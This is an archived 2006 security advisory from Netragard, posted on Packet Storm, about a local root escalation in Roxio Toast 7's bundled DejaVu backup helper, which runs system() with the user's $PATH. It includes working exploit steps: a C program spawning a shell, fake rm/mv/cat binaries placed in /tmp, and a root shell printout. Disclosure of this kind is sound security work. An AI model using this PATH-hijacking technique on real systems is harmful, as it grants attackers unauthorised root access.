what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Netragard Security Advisory 2006-06-24

Netragard Security Advisory 2006-06-24
Posted Aug 27, 2006
Authored by Adriel T. Desautels, Netragard | Site netragard.com

Roxio 7 Toast contains locally exploitable vulnerabilities due to insecure system() by calls by suid binaries which use the user's $PATH environment variable.

tags | exploit, vulnerability
SHA-256 | a9a41ad652cad025669286ea026676bda759c1424a925ade740e5e98f354c33a

Netragard Security Advisory 2006-06-24

Change Mirror Download
Hash: SHA1

Netragard, L.L.C. -- Vulnerability Research and Exploitation Team


[Advisory Information]
- ----------------------------------------------------------------------
Contact: : Adriel T. Desautels
Advisory ID : NETRAGARD-20060624
Product Name : Roxio Toast
Product Version : 7 Titanium
Vendor Name : Roxio
Type of Vulnerability : Local Root Compromise
Effort : Easy
Operating System : OSX
Other : Insecure usage of $PATH

[Product Description]
- ----------------------------------------------------------------------
"Toast 7 is the best way to save, share and enjoy a lifetime of digital
music, movies and photos on CD and DVD. Burn large files across
multiple discs; compress and copy DVD movies; add over 50 hours of
music to an audio DVD with on-screen TV menus, shuffle play, and rich
Dolby Digital sound; burn DivX files into DVDs. Do it all with the
fastest and most reliable burning software for the Mac OS - Toast."

- --http://www.roxio.com--

[Technical Summary]
- ----------------------------------------------------------------------
Doing a default installation of Roxio Toast 7 Titanium also installs
DejaVu which is used for backups. DejaVu uses a control panel helper
application which makes isecure system() calls. More specifically,
an attacker can exploit these system() calls using the user controlled
environment variable named $PATH and gain root access to the system.

[Technical Details]
- ----------------------------------------------------------------------

This was tested using a configured version of Roxio Toast 7 Titanium.

Roxio 7 Toast contains locally exploitable vulnerabilities due to
insecure system() by calls by suid binaries which use the users $PATH
environment variable.

The following shows the DejaVu suid binaries:

netragard-test-1$ find . -perm -4000

1-Exploitation is trivial. A user must first create small program such
as the one demonstrated by simple.c below.

netragard-test-1$ cat > simple.c

system("/bin/sh -i");

2-Once the user has created the program, the user must comple the
program, copy the program to replace rm, mv and cat, and insert it
into the $PATH variable.

netragard-test-1$cc -o chmod simple.c
netragard-test-1$cp chmod /tmp/rm
netragard-test-1$cp chmod /tmp/mv
netragard-test-1$cp chmod /tmp/cat
netragard-test-1$export PATH=/tmp/:$PATH

3-Once the user has finished with step 2, the user must then launch
the "System Preferences" control pannel.

Preferences.app/Contents/MacOS/System\ Preferences

4-After the user has launched the Systems Preferences helper
application, a GUI window should display. From that window click on
"Deja Vu" located in the "other" section. From there create a manual
backup and then click the backup button. At that point you should be
presented with a root shell prompt:

sh: no job control in this shell
sh-2.05b# id

uid=0(root) gid=0(wheel) groups=0(wheel), 81(appserveradm),
79(appserverusr), 80(admin)

[Proof Of Concept]
- ----------------------------------------------------------------------
Successful Created and Functional

[Vendor Status]
- ----------------------------------------------------------------------
Vendor contacted and notified of the issue.

Vendor Comment:
Deja Vu, the affected component of Roxio Toast, is bundled into Roxio
Toast and is third party software. Deva Vu is authored by Propaganda
Productions and not Sonic.

[About Netragard]
- ----------------------------------------------------------------------
Netragard offers specialized application and network security services
which enable its clients to take a proactive security stance. Each of
our services is driven by security professionals who specialize in
specific areas of Information Security. This specialized focus
differentiates Netragard from the competition by enabling Netragard
to produce deliverables which are the product of skilled security
professionals and not the product of automated tools and scripts.

[ For more information please visit http://www.netragard.com ]

- ---------------------http://www.netragard.com-------------------------
Netragard, L.L.C. assumes no liability for the use of the information
provided in this advisory. This advisory was released in an effort to
help the I.T. community protect themselves against a potentially
dangerous security hole. This advisory is not an attempt to solicit

- --

Netragard Vulnerability Research Team
advisories at netragard dot com
"We make I.T. Secure"
Version: GnuPG v1.4.2 (MingW32)


BullGuard Anti-virus has scanned this e-mail and found it clean.
Try BullGuard for free: www.bullguard.com

Login or Register to add favorites

File Archive:

September 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    2 Files
  • 2
    Sep 2nd
    21 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    17 Files
  • 5
    Sep 5th
    34 Files
  • 6
    Sep 6th
    29 Files
  • 7
    Sep 7th
    11 Files
  • 8
    Sep 8th
    25 Files
  • 9
    Sep 9th
    0 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    26 Files
  • 12
    Sep 12th
    23 Files
  • 13
    Sep 13th
    17 Files
  • 14
    Sep 14th
    22 Files
  • 15
    Sep 15th
    16 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    19 Files
  • 19
    Sep 19th
    60 Files
  • 20
    Sep 20th
    23 Files
  • 21
    Sep 21st
    15 Files
  • 22
    Sep 22nd
    8 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    17 Files
  • 26
    Sep 26th
    3 Files
  • 27
    Sep 27th
    13 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2022 Packet Storm. All rights reserved.

Security Services
Hosting By